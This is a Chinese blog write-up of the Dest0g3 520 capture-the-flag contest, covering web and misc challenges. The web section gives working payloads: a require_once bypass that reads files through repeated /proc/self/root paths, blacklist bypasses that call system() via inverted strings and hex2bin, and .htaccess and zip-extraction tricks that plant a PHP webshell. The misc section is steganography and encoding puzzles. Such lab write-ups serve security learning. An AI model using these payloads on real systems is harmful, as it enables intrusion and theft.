Dest0g3 520迎新赛web&misc

已于 2023-02-18 19:13:43 修改
阅读量1.3k 收藏 1
点赞数 1
分类专栏: 比赛wp 文章标签: web安全
于 2022-07-19 20:19:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/124880609
版权

目录

<1> Web

(1) phpdest

(2) EasyPHP

(3) ezrce

(4) funny_upload

(5) easySSTL

(6) ezzip

<2> Misc

(1) Pngenius

(2) EasyEncode

(3) 你知道js吗

(4) StrangeTraffic

(5) 4096

(6) Python_jail

(7) codegame

(8) 被污染的二维码

<3> AI

The correct flag

<1> Web

(1) phpdest

 <?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
    require_once($_GET['file']);
}

php的文件包含机制是将已经包含的文件与文件的真实路径放进哈希表中

require_once在调用时php会检查该文件是否已经被包含过,而这里在前面就已经包含了文件flag.php,我们在后面再想包含'flag.php'时就不能实现了,而我们需要做到就是怎么绕过这个哈希表,让php认为我们传入的文件名不在哈希表中,又可以让php能找到这个文件,读取到内容

/proc/self指向当前进程的/proc/pid//proc/self/root/是指向/的符号链接,想到这里,用伪协议配合多级符号链接的办法进行绕过,payload:

?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

base64解码后得到flag。

具体原理可看:require_once 绕过不能重复包含文件的限制

我们在审计时找到一处文件包含漏洞(使用require_once或include_once),想利用这个漏洞读取一下数据库配置文件之类的源码,通常可以使用php://filter/convert.base64-encode/resource=file这样的方式将文件以base64的形式读出来。但如果这个文件在前面已经被包含过了,则第二次包含就会失败,即使使用php://filter也一样。

此时我们可以使用“多重软连接”,正常情况下,PHP会将用户输入的文件名进行resolve,转换成标准的绝对路径,这个转换的过程会将…/、./、软连接等都进行计算,得到一个最终的路径,再进行包含。每次包含都会经历这个过程,所以,只要是相同的文件,不管中间使用了…/进行跳转,还是使用软连接进行跳转,都逃不过最终被转换成原始路径的过程,也就绕不过require_once。

但是,如果软连接跳转的次数超过了某一个上限,Linux的lstat函数就会出错,导致PHP计算出的绝对路径就会包含一部分软连接的路径,也就和原始路径不相同的,即可绕过require_once限制。 在Linux下,最常见的软连接就是/proc/self/root,这个路径指向根目录。

(2) EasyPHP

date()函数满足那个条件一个数不行的。但是下面还有一个 set_error_handler可以输出flag。

set_error_handler(error_function,error_types)

error_function 规定发生错误时运行的函数

set_error_handler(
    function() use(&$fl4g) {
        print $fl4g;
    }

所以我们post传入 ctf[]=1 报错,得到flag。

(3) ezrce

 <?php
highlight_file(__FILE__);
$aaa=$_POST['aaa'];
$black_list=array('^','.','`','>','<','=','"','preg','&','|','%0','popen','char','decode','html','md5','{','}','post','get','file','ascii','eval','replace','assert','exec','$','include','var','pastre','print','tail','sed','pcre','flag','scan','decode','system','func','diff','ini_','passthru','pcntl','proc_open','+','cat','tac','more','sort','log','current','\\','cut','bash','nl','wget','vi','grep');
$aaa = str_ireplace($black_list,"hacker",$aaa);
eval($aaa);
?>

发现passthru,exec(),popen,system等等命令执行函数都被过滤了。用不了。strireplace 还是大小写不敏感的。尝试一下取反绕过,进行无参数rce

执行一下system('ls /');

(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);

 发现flag。再执行 cat /flag

(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);

得到flag。

看后续别的师傅,得知题解预期解好像是hex2bin():

源代码没有过滤hex2bin()函数, 73797374656d -》system

post传入:aaa=hex2bin('73797374656d')('ls /'); 发现flag。

aaa=hex2bin('73797374656d')('rev /fl?g'); 可以用rev来逆转读取flag。

(4) funny_upload

试了试发现.htaccess文件可以上传并解析,但是过滤了文件内容<?,可以利用auto_append_file和php伪协议打组合拳绕过

AddType application/x-httpd-php .txt
php_value auto_append_file "php://filter/convert.base64-decode/resource=1.txt"

 然后传入一个1.txt文件,写入一句话木马的base64编码。

 

 蚁剑连接。在目录下得到flag。

参考:Web安全|.htaccess的奇淫技巧 - 腾讯云开发者社区-腾讯云

下面的都没做出来,根据别的师傅wp学习一下

Dest0g3 520迎新赛_Ff.cheng的博客-CSDN博客

(5) easySSTL

参考:以 Bypass 为中心谭谈 Flask-jinja2 SSTI 的利用 - 先知社区

(6) ezzip

没有信息,我们把s图下载下来,010editor打开,在末尾发现了一串base64

解码后得到源代码:

upload.php:
<?php
error_reporting(0);
include("zip.php");
if(isset($_FILES['file']['name'])){
    if(strstr($_FILES['file']['name'],"..")||strstr($_FILES['file']['name'],"/")){
        echo "hacker!!";
        exit;
    }
    if(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION)!="zip"){
        echo "only zip!!";
        exit;
    }
    $Myzip = new zip($_FILES['file']['name']);
    mkdir($Myzip->path);
    move_uploaded_file($_FILES['file']['tmp_name'], './'.$Myzip->path.'/' . $_FILES['file']['name']);
    echo "Try to unzip your zip to /".$Myzip->path."<br>";
    if($Myzip->unzip()){echo "Success";}else{echo "failed";}
}

zip.php:
<?php
class zip
{
    public $zip_name;
    public $path;
    public $zip_manager;

    public function __construct($zip_name){
        $this->zip_manager = new ZipArchive();
        $this->path = $this->gen_path();
        $this->zip_name = $zip_name;
    }
    public function gen_path(){
        $chars="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
        $newchars=str_split($chars);
        shuffle($newchars);
        $chars_key=array_rand($newchars,15);
        $fnstr = "";
        for($i=0;$i<15;$i++){
            $fnstr.=$newchars[$chars_key[$i]];
        }
        return md5($fnstr.time().microtime()*100000);
    }

    public function deldir($dir) {
         //先删除目录下的文件:
        $dh = opendir($dir);
        while ($file = readdir($dh)) {
            if($file != "." && $file!="..") {
                $fullpath = $dir."/".$file;
                if(!is_dir($fullpath)) {
                    unlink($fullpath);
                } else {
                    $this->deldir($fullpath);
                }
            }
        }
        closedir($dh);
    }
    function dir_list($directory)
    {
        $array = [];

        $dir = dir($directory);
        while ($file = $dir->read()) {
            if ($file !== '.' && $file !== '..') {
                $array[] = $file;
            }
        }
        return $array;
    }
    public function unzip()
    {
        $fullpath = "/var/www/html/".$this->path."/".$this->zip_name;
        $white_list = ['jpg','png','gif','bmp'];
        $this->zip_manager->open($fullpath);
        for ($i = 0;$i < $this->zip_manager->count();$i ++) {
            if (strstr($this->zip_manager->getNameIndex($i),"../")){
                echo "you bad bad";
                return false;
            }
        }
        if(!$this->zip_manager->extractTo($this->path)){
            echo "Unzip to /".$this->path."/ failed";
            exit;
        }
        @unlink($fullpath);
        $file_list = $this->dir_list("/var/www/html/".$this->path."/");
        for($i=0;$i<sizeof($file_list);$i++){
            if(is_dir($this->path."/".$file_list[$i])){
                echo "dir? I deleted all things in it"."<br>";@$this->deldir("/var/www/html/".$this->path."/".$file_list[$i]);@rmdir("/var/www/html/".$this->path."/".$file_list[$i]);
            }
            else{
                if(!in_array(pathinfo($file_list[$i], PATHINFO_EXTENSION),$white_list)) {echo "only image!!! I deleted it for you"."<br>";@unlink("/var/www/html/".$this->path."/".$file_list[$i]);}
            }
        }
        return true;

    }


}

代码审计可知:它会解压ZIP,然后删除ZIP除去图片的所有文件

根据大佬博客里提到使用了 ZipArchive,绕过zip解压方法:两个文件 1.php 和 2.txt,压缩为zip,对压缩文件的文件名进行操作可以导致解压失败从而终止解压,然后遗留shell文件getshell,修改其中一个filename为 /

蚁剑连接:

http://c0213195-4c20-4885-8344-531d0a5476db.node4.buuoj.cn:81/20ef813f9551b2a0c9c242171ad8803d/1.php

密码即为你上传的木马 我这里是1vxyz

进入之后根目录下找到flag点开却没有内容,进入终端cat一下发现没有权限

我们nl来读取,得到flag

 其他题目水平还不够,看了wp也不明白 以后在尝试看一看

<2> Misc

(1) Pngenius

010editor打开,发现里面还有PK zip文件里有flag.txt

 binwalk -e 分离出zip文件 加密文件

存在图片隐写,stegsolve打开, RGB都是0 处可以得到password

 解压后得到flag

(2) EasyEncode

010editor打开发现不存在伪加密

也没有其他提示,应该是弱密码 放到ARCHPR爆破一下

4-6位数字 爆破一下 100861

 解码后得到一串 摩斯密码

..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ..... ...-- ..--- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ....- ...-- --... ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ..... ...-- -.... ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- --... -.... .---- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- -.... ...-- ....- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ....- ...-- ....- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ....- ...-- ..--- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- -.... -.... ..... ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ....- -.... ....- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ...-- ...-- ...-- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- --... ...-- ....- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ....- ...-- ..... ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ..... -.... .---- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ..... ...-- --... ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ...-- ...-- ----. ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- -.... -.... ..--- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- -.... ...-- .---- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ..... ...-- --... ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ...-- ...-- ..... ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- -.... -.... ..... ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ..... ...-- ---.. ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- --... -.... .---- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ....- ...-- -.... ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- --... -.... .---- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ..... ...-- ---.. ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ...-- ...-- ..--- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ..... ...-- ..... ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ...-- ...-- ----- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- -.... ...-- ...-- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ...-- ...-- ...-- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- -.... -.... ...-- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- -.... ...-- -.... ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ....- -.... ..... ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ....- ...-- -.... ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ...-- ...-- ----. ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ..... ...-- -.... ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- -.... ...-- -.... ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ..... ...-- .---- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ..--- ...-- ..... ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ...-- ...-- ...-- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ....- ...-- ....- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ..--- ...-- ..... ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ...-- ...-- ...-- ..... -.-. --... ..... ...-- ----- ...-- ----- ...-- ....- ...-- ....-

解码后得到 一串hex编码

5c75303035325c75303034375c75303035365c75303037615c75303036345c75303034345c75303034325c75303036655c75303034645c75303033335c75303037345c75303034355c75303035615c75303035375c75303033395c75303036625c75303036315c75303035375c75303033355c75303036655c75303035385c75303037615c75303034365c75303037615c75303035385c75303033325c75303035355c75303033305c75303036335c75303033335c75303036635c75303036365c75303034655c75303034365c75303033395c75303035365c75303036365c75303035315c75303032355c75303033335c75303034345c75303032355c75303033335c7530303434

在进行hex解码 得到一串 unicode编码

\u0052\u0047\u0056\u007a\u0064\u0044\u0042\u006e\u004d\u0033\u0074\u0045\u005a\u0057\u0039\u006b\u0061\u0057\u0035\u006e\u0058\u007a\u0046\u007a\u0058\u0032\u0055\u0030\u0063\u0033\u006c\u0066\u004e\u0046\u0039\u0056\u0066\u0051\u0025\u0033\u0044\u0025\u0033\u0044

ASCII转unicode得到

RGVzdDBnM3tEZW9kaW5nXzFzX2U0c3lfNF9VfQ%3D%3D

“%3D”在url编码中是“=”’ 所以这是一段base64编码

解码后得到flag:Dest0g3{Deoding_1s_e4sy_4_U}

(3) 你知道js吗

附件下载后 记事本打开 看见了 PK和一堆乱码 应该是.zip文件

解压后得到一堆xml文件 浏览器打开document.xml时发现了三串base64编码

 解码后是url编码过的

URL在线转码/解码

url解码后三个拼接到一块

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
            <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<application xmlns="urn:schemas-microsoft-com:asm.v3">
        <dpiAwareness xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">Do you know js</dpiAwareness>
<script language="javascript">document.write(unescape('<html>
<body>

<!DOCTYPE html>
<html>
<head>
    <title>Do You Know js</title>
<HTA:APPLICATION
  APPLICATIONNAME="Do You Know js"
  ID="Inception"
  VERSION="1.0"
  SCROLL="no"/>
 
<style type="text/css">
</head>
    <div id="feature">
            <div id="content
                </style>
                <h1 id="unavailable" class="loading">Building js.....</h1>
                <script type="text/javascript" language="javascript">
                    function RunFile() {
          var WshShell = new ActiveXObject("WScript.Shell");
                    WshShell.Run("notepad %windir%/Desktop/js.txt", 1, false);
          /* var oExec = WshShell.Exec("notepad"); *%2

F
                    }
                </script>
        </div>
    </div>
<body>
    <input type="button" value="Implant Inception Here" οnclick="RunFile();"/>
    <p style="color:white;">

+++++ ++[-> +++++ ++<]> +++.. ++.-. ++.-- --.++ ++.---.-.- --.++ ++++.+.--- -..++ ++.<+ ++[-> +++<] >++.< +++[->---< ]>--- ---.+ ++++. -----.+++. ...-- ---.+ ++++. ---.+ ++.-- ---.+ ++++. ---.. +++++ +.--- ----.<++++ [->++ ++<]> ++.<+ +++[- >---- <]>-. ---.++++++ .---- -.++.++.+.--.--.<+++ +[->+ +++<] >++.< ++++[ ->--- -<]>-.+.-. ---.+ ++.+. -.++++.--- --.<+ +++[- >++++ <]>++ .<+++ [->-- -<]>- ----. ----. +.+++ +.----.--- .+++. -..<+ +++[- >++++ <]>++.<+++ +[->- ---<] >-.++ +++.- ----.+++.. ---.+ ++.-- --.+. ..+++ +.-.- ----. +++++.---- .+.++ ++.-- --.++++.-. ----. +.-.+ ++++.<+++[ ->+++ <]>++ ++.<
</p>
</body>
</body>
  </html>
'));</script>

发现一串brainfuck 编码

Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]

在线解码得到一段16进制串: 446573743067337B38366661636163392D306135642D343034372D623730322D3836636233376162373762327D 

hex解码得到flag:Dest0g3{86facac9-0a5d-4047-b702-86cb37ab77b2}

(4) StrangeTraffic

名字听起来像奇怪的流量,流量分析题。需要用到wireshark

他们说可以看出是mudbus工控流量,emmm这方面我不太清楚

追踪TCP流

 在每个循环的结尾都存在base64一部分:

  直接慢慢划自己记录下来得到密文:

 RGVzdDBnM3szMUE1QkVBNi1GMjBELUYxOEEtRThFQS0yOUI0RjI1NzEwOEJ9

base64解码得到flag:Dest0g3{31A5BEA6-F20D-F18A-E8EA-29B4F257108B}

(5) 4096

游戏题目,开启环境后,在前端js代码中搜索flag

得到一串base64编码(part 一部分)

 两次base64解码后得到:4ee7-b673-971d81f8b177}

同时,在网络中我们得到了一张.png图片

 另一部分应该藏在这个图片中

010editor打开 发现最末尾还有应该什么什么.jpg 应该还有其他文件在其中

binwalk -e favicon.png 分离文件 不过好像分离不出来

 其他师傅都是用的foremost工具,搜了搜

Binwalk在CTF中常用于分析隐藏文件

binwalk +文件名可直接扫描
通过扫描能够发现目标文件中包含的所有可识别的文件类型
binwalk -e +文件名扫描
extract自动提取已知的文件类型 ,按照定义的配置文件中的提取方法从固件中提取探测到的文件系统

foremost在数字取证中和CTF中常用来恢复、分离文件。

它默认支持19种类型文件(jpg, gif, png, bmp, avi, exe, mpg, mp4, wav, riff, wmv, mov, pdf, ole, doc, zip, rar, html, cpp 等文件)的扫描识别恢复,还可以通过(通过配置它的配置文件foremost.conf)增加新的支持类型。
 

foremost favicon.png 得到了一个output文件夹

分离出来了一个加密的压缩包(partflag_jpg)、一个.wav音频和一个png图片

耳朵听一下音频,在最开始和结束的时候有拨号音。据说中间的是SSTV(Slow-scan television)

慢扫描电视(Slow-scan television)是业余无线电爱好者的一种主要图片传输方法,慢扫描电视通过无线电传输和接收单色或彩色静态图片。

参考:一种有趣的隐写技术(图转声,声转图) 图片转音频

 涉及到的工具有

SSTV Encoder 这个应用程序通过播放音频发送图像(图像→音频)(SSTV编码器)

Robot36  这个应用程序通过收听音频接收图像(音频→图像)(SSTV图像解码器)

这里我们运用robot36来解码转图像  电脑播放,手机自动识别,真神奇

 得到密文:MD5(cell phone) 估计密码就是手机号的md5

然后我们截取前一段和后一段的拨号音

我也不太会熟练这个工具 就左键按住不动 Backspace删除掉 保存即可

 dtmf2num工具识别一下拨号号码

 逆过来就是电话号 13879085947(脚本跑的多了一个7)得到压缩包密码

 

 解压得到下图:

 

 gaps拼图 手敲出这段base64密文

 gaps 官方 readme.md 解决puzzle的用法

 “–generations” 设置的参数多少都可以,最好就等于原始图片的数量,也就是piece的数量

gaps --image=puzzle.jpg --generations=20 --population=600

 

 nima 这怎么看,再修复一下,发现第二次的和第一次的不同,明显好多了

 最后不断拼接尝试解码,RGVzdDBnM3tIZDRKMTE0Zi05ZWU0LQ==

 得到另一半flag: Dest0g3{Hd4J114f-9ee4-

(6) Python_jail

根据提示隐藏的字符猜测是0宽隐写

  得到提示:whitespace加密

Whitelips the Esoteric Language IDE

whitespace加密:

大多数的编程语言都会忽略代码中的空白字符,“Whitespace”是专门来弥补普通编程语言,它给予这些空白字符最重要的地位。

在“Whitespace”编程语言中,任何非空白的字符都是被忽略的,只有空格符、tab和换行符被认为是有效的语义字符。

 解密后得到压缩包密码

 解压得到secret1.png stegsolve查看隐写,在RGB0 处发现base64特征

解码得到flag

(7) codegame

Funny and ez codegame with Key to celebrate EDG

改为.zip解压后得到一段KEYcode 和一个加了密的Treasure.zip

HAI EDGNB code
I HAS A CODE ITZ "THISISTHEPASSWORD"
I HAS A MSG ITZ ""
I HAS A COUNTER ITZ 0
I HAS A NUM
IM IN YR LOOP UPPIN YR COUNTER WILE COUNTER SMALLR THAN LEN OF CODE
I HAS A C ITZ CODE!COUNTER
NUM R ORD OF C
NUM R SUM OF NUM AN -3
IZ NUM SMALLR THAN 65?, NUM R SUM OF NUM AN 26, KTHX
NUM R CHR OF NUM
MSG R SMOOSH MSG AN NUM
IM OUTTA YR LOOP
VISIBLE MSG
KTHXBYE

搜了搜这种密码是LOLCODE

在线解码网址:https://www.dcode.fr/lolcode-language

 得到:QEFPFPQEBMXPPTLOA  即压缩包密码

打开文档发现AES 其他什么都没有,7z打开doc压缩包

发现了flllllll1ag.txt 得到一堆表情符号

应该是emojiAES  KEY:QEFPFPQEBMXPPTLOA

解码网站:emoji-aes

直接解密不行,还需要advanced那里偏移一下,试出来是4

hex解码得到flag:flag{9f68f334-017a-4201-92df-dddcc145334d}

(8) 被污染的二维码

修改附件后缀为zip后提取出来了一个flag1 和flag2

010editor打开发现 flag1是一个png图片,flag2是一个7z压缩包

 stegsolve打开看看有没有隐藏信息,然鹅并没有

 但修改后缀为.7z后报错了

 发现是7z文件头错误,应该是37 7A BC AF 修改完后对其解压,发现需要密码

回到之前的图片看一下 binwalk 查看图片隐藏文件

 binwalk -e 分离文件 在A56中得到了密码:Welcome_to_Dest0g3!!!

 得到一个txt文件 内容为:

ETImqQOaZ3​​​​​​​‍‍‍​gxL2MxMzMuAP1wMGR5YG8/Cm8​​​​​​​‌‍​​gBGNlLv1​​​​​​‌​‌​​xMwquZGHlAGR2Lmq​​​​​​​‍‌​‍​​​​​​​‌‍​​​​​​​​​‍‍‌‍9

我们看见行数和列数有问题,猜测存在0宽隐写,在下面这种模式下解密得到A-MN-Z

 所以这段密文可能是rot13,解码后得到:

RGVzdDBnM3​​​​​​​‍‍‍​tkY2ZkZmZhNC1jZTE5LT8/Pz8​​​​​​​‌‍​​tOTAyYi1​​​​​​‌​‌​​kZjdhMTUyNTE2Yzd​​​​​​​‍‌​‍​​​​​​​‌‍​​​​​​​​​‍‍‌‍9

base64解码得到:Dest0g3{dcfdffa4-ce19-????-902b-df7a152516c7}

还有四个字符未知,应该是藏在二维码中

这里我们需要用QRazyBox手撸补全一下二维码

QRazyBox - QR Code Analysis and Recovery Toolkit

在补全的时候,不能按照原flag1.png 应该用stegsolve将其xor一下save 对比反色后的涂

  (根据树木的推理,应该是墨水污染了二维码,反色后可以看见黑色区域像墨水)

这里只能补个大概,补全不了  太难了 最后扫出四个字符的时候二维码还是没有补全

tools 里的 Extract QR information 可以尽可能地提取二维码的信息自动补全一点

 最终得到掩码 45cb 得到flag

<3> AI

The correct flag

 发现还有好多隐藏文字

弄到一个文件里之后,用python脚本进行一下词频统计

alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()\_+-/={}[] "#所有正常打印字符
strings = open('123.txt').read()#读取需要统计频数的文本
word = strings.split()

result = {}

for i in word:
    if i not in result:
        result[i] = 1
    else:
        result[i] += 1

res = sorted(result.items(), key=lambda item: item[1], reverse=True)

f = open('out.txt','w')

num = 0
for data in res:
    num += 1
    print('频数第{0}: {1}'.format(num, data))
    f.writelines('频数第{0}: {1}'.format(num, data))
    f.write('\n')
f.close()
print('\n---------------以下是频数从多到少的字符,按照从前到后排序---------------')
for i in res:
    flag = str(i[0])
    print(flag[0], end="")
葫芦娃42
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BMZCTF_WEB_ezeval
Kobalos的博客
09-24 197
查看代码 <?php highlight_file(__FILE__); $cmd=$_POST['cmd']; $cmd=htmlspecialchars($cmd); $black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','exec','cookie','$','in.
CTF真题-Dest0g3CTF2022招新
06-01
CTF真题-Dest0g3CTF2022招新,来自BUUCTF。
Dest0g3 520迎新复现(思路演练)
NYG694的博客
02-24 1020
这几个都不能实现绕过,所以就是报错,用数组就可以报错,这题让我想到了SICTF的oysterphp题目里面我一度想用数组绕过,发现会系统报错所以印象深刻,当然那后来使用prec回溯。想到一个出题点就是preg一个不允许单个/的出现,但多个/可以,不过这里前面的php协议就要和后半段分开来输入才能实现这个,都是我自己的想法可能没什么含金量哈哈。呃刚去看了下,好像很简单的,就是把原本的命令先进行取反再url编码一下再取反就可以了。网上的脚本一直躺着pharm里面,总算用上了,还是要常被,自己写还是有点费脑了。
Dest0g3 520迎新 | root 新生
qq_32284207的博客
06-01 751
题解 费马分解 babyAES 题目 题解 ezStream 题目 题解 爆破求seed2 求flag ezDLP 题解 sage离散对数 Mr.Doctor 题目 题解 seed1、seed2 seed flag Bag 题目 题解 学习参考 学习参考 FourThousandRSA 题目 题解 NSSCTF原题,脚本小子🤔(事后具体复现) misc EasyEncode 爆破压缩包密码100861 摩斯码 hex py print() url base6
Dest0g3 520迎新部分WP_v6 = 247;(1)
最新发布
2401_84520457的博客
05-16 352
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
BMZCTF WEB_ezeval
lay_breeze的博客
08-19 170
BMZCTF WEB_ezeval 记一次做题思路 <?php highlight_file(__FILE__); $cmd=$_POST['cmd']; $cmd=htmlspecialchars($cmd); $black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','ex
Dest0g3 520迎新WEB 无java部分 wp
m0_52199518的博客
05-29 1437
Dest0g3 520迎新 只写了web,勉勉强强拿了总榜58名,web分榜11名这个尴尬的名次,前面的师傅太强了 phpdest <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once($_GET['file']); } 文件包含题,因为使用的是require_once(),所以不能直接读flag.php; 没有phpinfo信息,session没有开
Dest0g3-Java部分1
08-03
Dest0g3-Java部分1
oracle数据库设置db_recovery_file_dest_size参数为0
11-02
当你设置了归档路径,并且不希望使用闪回区域来存储归档日志时,可以将`db_recovery_file_dest_size`设置为0,这样Oracle就不会在这个位置创建或存储任何恢复文件。 设置`db_recovery_file_dest_size`为0的步骤如下...
DEST戴尔服务器硬件日志收集工具
04-02
1.本工具为DELL服务器官方硬件日志提取工具,不是安装程序,请直接运行"dsetreport.hta"即可,运行时长大约5~15分钟,运行期间请关闭杀软等; 2.本程序可以在不关机的情况下完成服务器错误日志的收集;...
Dest
03-17
标题“Dest”可能是指一个项目或者软件的名称,而描述中的“Dest”没有提供更多信息,可能是由于疏忽或保密原因。然而,考虑到标签是“Java”,我们可以推测这可能是一个使用Java编程语言开发的项目。接下来,我们将...
Dest0g3 520迎新 writeup by 树木
JEWSWS的博客
05-29 3558
信息 用户名:树木敲阔爱 类型:分榜前三 排名:25 MISC Welcome to fxxking DestCTF 关注微信公众号,得到flag Dest0g3{W31c0m3_t0_DestCTF2022!} Pngenius 题目是一张PNG图片,很难不让人联想到隐写术,我们使用stegsolve打开 在R0G0B0发现了Password for zip,猜测图片包含ZIP,使用foremost进行分解 分解后发现有密码,使用刚刚解出来的密码解压,得到flag
[NSSRound#4 SWPU]ez_rce
m0_73121489的博客
04-28 503
标签说是CVE-2021-41773(Apache HTTP Server路径穿越漏洞)这里直接cat /flag_is here 是什么都没有的。我一个个试了一遍,在run.sh里面找到了flag的真正位置。dirsearch扫目录也没有扫什么有用的出来。
从0到1的CTF之旅————Misc(2)
qq_44373268的博客
06-08 364
今天继续做misc题目,自不必多言 ————————————————————————————————————————————第十一题:LSB(题目如下) 题目已经说是LSB隐写了,自然是要使用stegsolve 三个都选0,默认RGB,这就是最简单的提取LSB隐写的方式 看了一圈,发现没得flag,不过开头的.png倒是提醒了我,这里面可能还藏着一张图片,果断save bin保存下来。 得到一个文件,将这个文件丢到foremost分解,分解出一个二维码。 扫描二维码,得到flag{1sb_i4_s0_
2021年江西省大学生信息安全技术大-线上-MISC-STAGA
weixin_46079186的博客
10-24 1035
STAGA-1 cat.png打开一张猫的图片 用StegSolve 打开,发现red、Green、Blue 0通道都有东西 选择0 通道 Prevoew 执行一下发现 base64 编码 解码下 flag{724b4b8e8f1e5523de67c94bb19c2f52} STAGA-2 国际歌.mp3 音频文件 听了一下发现后面一部分没有声音,猜测有东西,分离一下foremost 分离一下得到一张图片 StegSolve 打开 往左点了几下,flag就出来了 flag{y0u_are_sos..
BUU Dest0g3 520迎新 WEB writeup
weixin_43610673的博客
05-29 2062
WEB phpdest <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once($_GET['file']); } require_once 绕过不能重复包含文件的限制 /?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/r
php destruct的作用,Php Destruct被称为两次
weixin_42159267的博客
03-25 155
下面的代码说明了两次调用destruct().我想知道为什么?class A {function hi(){ echo 'hi'; }function __destruct(){echo 'destroy';}}class B{public $this_ = '';function __construct(){$this->this_ = new A;}function __call($me...
popen函数php,有关php popen()函数的文章推荐10篇
weixin_42317626的博客
03-20 381
1.PHP popen如何实现多进程并发执行,循环里的pclose会等待进程完毕再进行下一次循环2.假设有17个进程要开启,如何实现每次启动5个进程,并且每完成一个进程就关闭一个进程,同时开启下一个进程,也就是说最多只有5个进程同时执行//启动2个进程for($i = 0;$i < 2;$i++){$command = "$phpPath $destPHPFile >> $log...
from Crypto.Util.number import * f = open('flag.txt', 'r') flag = f.read() f.close() assert flag[:8] == "Dest0g3{" 这段代码的作用
07-12
4. 使用断言语句(`assert`)检查变量 `flag` 的前8个字符是否等于 "Dest0g3{"。如果不相等,将引发异常。 综上所述,这段代码的目的是读取名为 'flag.txt' 的文件,并确保文件内容的前8个字符是 "Dest0g3{"。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

